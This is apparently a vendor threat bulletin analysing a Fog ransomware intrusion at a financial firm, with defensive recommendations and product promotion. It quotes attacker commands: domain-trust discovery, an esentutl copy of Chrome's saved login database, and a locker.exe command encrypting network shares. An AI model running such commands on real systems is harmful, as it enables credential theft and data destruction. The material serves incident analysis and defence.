Fog Ransomware Now Targeting the Financial Sector; Adlumin Thwarts Attack

Threat Bulletin Series

Key Takeaways

  • The Fog Ransomware group, which has historically been observed only attacking organizations in the education and recreational sectors, is now pursuing more lucrative targets in the financial services sector.
  • Adlumin responded to a ransomware attack on a financial services customer in August 2024, with evidence connecting the activity to Fog, including techniques previously used on education and recreation targets
  • Adlumin’s technology isolated the affected machines and locked out attackers within minutes, preventing any significant encryption or data theft from taking place.
  • Further investigation found Indicators of compromise including IP addresses originating in Russia. While little is known about Fog Ransomware, including any geographic ties, this alone does not provide enough evidence to attribute a geographic origin with a high level of confidence, due to the potential for attackers to be masking their location with jump servers or other techniques.

In early August 2024, threat actors launched a ransomware attack on a mid-sized financial business using compromised VPN credentials. The cybercriminals deployed a ransomware variant known as “Fog” (a.k.a. “Lost in the Fog”) targeting sensitive data on endpoints running both Windows and Linux operating systems. However, the attack was successfully thwarted by Adlumin’s innovative technology, which uses decoy files as sensors to detect ransomware activity within the network.

The Fog Ransomware

Fog is a variant of the STOP/DJVU ransomware family, first observed in 2021. It exploits vulnerabilities in compromised VPN credentials to breach network defenses and primarily targets sectors such as education and recreation. Once inside a network, Fog uses advanced techniques, including pass-the-hash attacks, to escalate privileges to an administrative level, significantly amplifying its impact. It exploits vulnerabilities in compromised VPN credentials to breach network defenses and primarily targets sectors such as education and recreation.

After infiltration, Fog executes a series of actions designed to cripple network security. These include disabling protective mechanisms, encrypting critical files—especially Virtual Machine Disks (VMDKs)—and eradicating backup data, leaving victims with little choice but to consider paying the ransom. The encrypted files are typically marked with extensions like ‘.FOG’ or ‘.FLOCKED’ and are accompanied by a ransom note directing victims to a negotiation platform on the Tor network.

The lack of direct attribution to established APT groups suggests that Fog ransomware likely originates from a new, highly skilled threat actor.

Network Discovery

The attackers initiated network discovery by sending a series of pings targeting other endpoints. They stored the output of these pings in text files, ‘pings.txt’ and ‘pingw.txt’. Subsequently, they used the tool ‘Advanced_Port_Scanner_2.5.3869(1).exe’ to conduct network reconnaissance, scanning hosts within the network using elevated privileges from the compromised service accounts.

Lateral Movement

The Adlumin team traced the infiltration to an unprotected system, with the attack originating from an IP address in Russia. The attackers used two compromised service accounts to move laterally within the network, leveraging domain trust relationship information by executing the command:


nltest /domain_trusts


They then deployed a binary called ‘SharpShares.exe’ to map network drives and share folders on other machines, enabling further lateral movement.

Credential Harvesting

The next step involved using the Microsoft command-line utility ‘esentutl.exe’ to back up login data stored on endpoints for multiple users, including encrypted credentials from Google Chrome, using the following command:


cmd.exe /Q /c esentutl.exe /y “C:\Users\”USERNAME”\AppData\Local\Google\Chrome\User Data\Default\Login Data” /d “C:\Users\”USERNAME”\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp”


Execution

The threat actor used ‘Rclone’, a powerful open-source command-line tool, to sync and transfer data from compromised endpoints. They tailored the command to include files modified within the last two years while excluding certain file types.

The ransomware was propagated using a tool named ‘locker.exe’, signifying its role in encrypting or ‘locking’ the files. The following command was executed:


C:\programdata\locker.exe -id xCcNKl -nomutex -size 10 -console -target \\”HOSTS” .DOMAIN.COM\”SHAREDRIVE”


A ‘readme.txt’ file containing the ransom letter was then placed on all infected endpoints. Additionally, the attackers used WMIC and PowerShell commands to delete system shadow copies, preventing victims from restoring their files from backups.

Adlumin Ransomware Prevention

As the attack progressed to the exfiltration phase, Adlumin’s Ransomware Prevention feature automatically isolated the affected machines, locked out the attackers, and prevented data theft. Launched in April 2024, this service consists of scripts embedded within the Adlumin Security Platform Agent that monitor malicious activities across customers’ networks.

The agent deploys decoy files on protected endpoints that remain dormant until abnormal or malicious activity is detected. If ransomware attempts to encrypt these files, the scripts automatically execute commands to remove the affected devices from the network, containing the threat and preventing further damage. Alerts are sent to the Adlumin platform for further investigation.

Adlumin Ransomware Prevention is a first-of-its-kind patented technology, representing a significant advancement in the fight against ransomware.

Recovery

After isolating the targeted endpoints, security engineers examined the systems and found binaries for port scanners, encryption software, RMM tools, and other artifacts left by the attackers. They also identified the vulnerable endpoints that facilitated the unauthorized access.

The impacted systems were evaluated and restored to full health, eliminating the potential for another similar attack.

Recommendations

The Adlumin Team recommends the following measures to protect against Fog ransomware attacks:

  • Use Multi-Factor Authentication (MFA): Implement MFA for all VPN connections to reduce the risk of compromised credentials.
  • Regularly Update and Patch VPN Software: Ensure all VPN applications are up to date with the latest security patches.
  • Monitor VPN Access: Implement monitoring tools to detect suspicious activities, such as unusual login attempts or access from unfamiliar locations.
  • Isolate Affected Endpoints: Implement automated isolation procedures that trigger when ransomware is detected.
  • Utilize a Comprehensive Security Platform: Protect endpoints with a platform like Adlumin’s, which can monitor and respond to threats in real-time.
  • Disable Unnecessary Services: Avoid using Windows Management Instrumentation Command-line (WMIC) and PowerShell scripts unless necessary.
  • Regularly Backup Critical Data: Maintain up-to-date backups stored offline or in a secure, immutable environment.
  • Apply the Principle of Least Privilege: Limit administrative privileges to minimize the impact of a successful attack.
  • Conduct Regular Security Audits: Regularly audit network and endpoint security to identify and rectify vulnerabilities.
  • Establish Incident Response Plans: Develop and test incident response plans for detecting, containing, and recovering from ransomware attacks.
  • Monitor Network Traffic: Use advanced threat detection to monitor network traffic for signs of lateral movement or other suspicious activities.

Finally, companies should consider adding Adlumin’s Ransomware Prevention service to their network endpoints to prevent ransomware attacks from escalating. For a demo, visit www.adlumin.com/demo.

Indicators of Compromise (IOCs)